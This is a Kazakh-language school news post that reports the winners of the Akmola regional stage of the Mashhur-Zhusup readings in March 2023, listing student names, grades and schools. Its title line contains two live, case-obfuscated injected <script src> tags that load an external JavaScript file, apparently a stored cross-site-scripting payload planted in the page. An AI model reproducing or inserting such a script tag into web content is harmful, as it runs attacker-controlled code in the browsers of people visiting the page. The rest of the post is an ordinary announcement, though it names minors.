Республикалық Мәшһүр-Жүсіп оқулары облыстық кезеңінің қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.03.2023

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығының ұйымдастыруымен 2023 жылғы 2-3 наурыз күндері аралығында  8-11 сынып оқушылары арасында  Республикалық Мәшһүр-Жүсіп оқуларының онлайн облыстық кезеңі өткізілді.

Байқаудың негізгі мақсаты – философ-ақынның рухани мұрасын дәріптеу, шығармаларында бейнеленген туған жерге сүйіспеншілік, белсенді азаматтық ұстанымды өскелең ұрпақта тәрбиелеу; тұлғаның зияткерлік және шығармашылық әлеуетін дамыту.

Байқау 4 бағыт бойынша өткізілді:

I бағыт – «Алдыма өлең жаз деп қағаз келген, Сөзімді сөйлеп бақтым мен де білген».

II бағыт – «Бас болып өнер білсең, тіпті жақсы».

III бағыт - «Білімді зерек адам болам!» - десең, Қара өзіңді басқаның айнасымен».

IV бағыт - «Мәшһүр-Жүсіп  шығармалары және «Ұлы даланың ұлы есімдері».

Байқауға Ақмола облысының жалпы білім беретін ұйымдарының 36 оқушысы қатысты.

Мәшһүр-Жүсіп оқуларының қорытындысы бойынша I орын алған оқушылар:

1.«Бас болып өнер білсең, тіпті жақсы» бағыты бойынша Әскер Аяулым - Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының № 19 жалпы орта білім беретін мектебінің 9-сынып оқушысы;

2.«Білімді зерек адам болам!» - десең, Қара өзіңді басқаның айнасымен» бағыты бойынша Амиржанова Гүлім - Ақмола облысы, Степногорск қаласы,  №4 "Болашақ" облыстық мамандандырылған мектеп- лицей – интернатының 11-сынып оқушысы;

3.«Мәшһүр-Жүсіп  шығармалары және «Ұлы даланың ұлы есімдері» бағыты бойынша Ақылбай Диас - Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының Мәлік Ғабдуллин атындағы № 3 көпсалалы  гимназиясының 10-сынып оқушысы.

Мәшһүр-Жүсіп оқуларының қорытындысы бойынша II орынмен келесі оқушылар марапатталды:

1.«Алдыма өлең жаз деп қағаз келген, Сөзімді сөйлеп бақтым мен де білген» бағыты бойынша Әбдірайым Әлайдар - Ақмола облысы, Көкшетау қаласы, Абай атындағы (қазақ тілінде оқытылатын) дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы;

2.«Бас болып өнер білсең, тіпті жақсы» бағыты бойынша Айтмағанбет Баянды - Ақмола облысы, Степногорск қаласы,  №4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 11-сынып оқушысы;

3.«Білімді зерек адам болам!» - десең, Қара өзіңді басқаның айнасымен» бағыты бойынша  Алимжанова Рауана - Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Красный Яр ауылының № 3 көпсалалы мектеп-гимназиясының 11-сынып оқушысы;

4.«Мәшһүр-Жүсіп  шығармалары және «Ұлы даланың ұлы есімдері» бағыты бойынша  Кенжебек Гүлжан - Ақмола облысы білім басқармасының Целиноград ауданы бойынша білім бөлімі Тасты ауылының жалпы орта білім беретін мектебінің 10-сынып оқушысы.

Мәшһүр-Жүсіп оқуларының қорытындысы бойынша III орынмен келесі оқушылар марапатталды.

«Алдыма өлең жаз деп қағаз келген, Сөзімді сөйлеп бақтым мен де білген» бағыты бойынша:

1. Қажыбай Жанель - Ақмола облысының Зеренді ауданы бойынша білім бөлімінің М.Ғабдуллин атындағы мектеп-гимназиясының 8-сынып оқушысы;

2. Майлхан Назерке - Ақмола облысы білім басқармасының Целиноград ауданы бойынша білім бөлімі Қоянды ауылының  № 2  жалпы орта білім беретін мектебінің 8-сынып оқушысы;

3.«Бас болып өнер білсең, тіпті жақсы» бағыты бойынша  Соспанова Амина - Ақмола облысы білім басқармасының Степногорск қаласы  бойынша білім бөлімі Степногорск каласының  Абай Құнанбаев атындағы №6 мектеп-гимназиясының 8-сынып оқушысы;

4.«Білімді зерек адам болам!» - десең, Қара өзіңді басқаның айнасымен» бағыты бойынша Ұзақбаева Айкөркем - Ақмола облысы білім басқармасының Ерейментау ауданы бойынша білім бөлімі Тайбай ауылының жалпы орта білім беретін мектебінің 10-сынып оқушысы;

5.«Мәшһүр-Жүсіп  шығармалары және «Ұлы даланың ұлы есімдері» бағыты бойынша Ясынбек Мүбарак - Ақмола облысы білім басқармасының Ерейментау ауданы бойынша білім бөлімі Бөгенбай батыр атындағы мектеп-лицейінің 10-сынып оқушысы;

Мәшһүр-Жүсіп оқуларының қорытындысы бойынша грамотамен марапатталған оқушылар:

1.«Бас болып өнер білсең, тіпті жақсы» бағыты бойынша  Бермахамбет Бүркіт - Ақмола облысы білім басқармасының Бұланды ауданы бойынша білім бөлімі Макинск қаласының мектеп-гимназиясының 9-сынып оқушысы;

2.«Білімді зерек адам болам!» - десең, Қара өзіңді басқаның айнасымен» бағыты бойынша Бекмадия Жанел - Ақмола облысы білім басқармасының Степногорск қаласы бойынша білім бөлімі Ақсу кентінің №1 жалпы орта білім беретін мектебінің 9-сынып оқушысы;

3.«Мәшһүр-Жүсіп  шығармалары және «Ұлы даланың ұлы есімдері» бағыты бойынша   Сонгобай Акерке - Ақмола облысы білім басқармасының Бұланды ауданы бойынша білім бөлімі Макинск қаласының №2 жалпы орта білім беретін мектебінің 11-сынып оқушысы.

Мәшһүр-Жүсіп оқуларының облыстық кезеңінде I орын алған жүлдегерлер республикалық кезеңге жолдама алды. Жеңімпаздарға сәттілік тілейміз!!!

Просмотров: 342


Пікір қосу



Деректерді қолтаңбаға қосу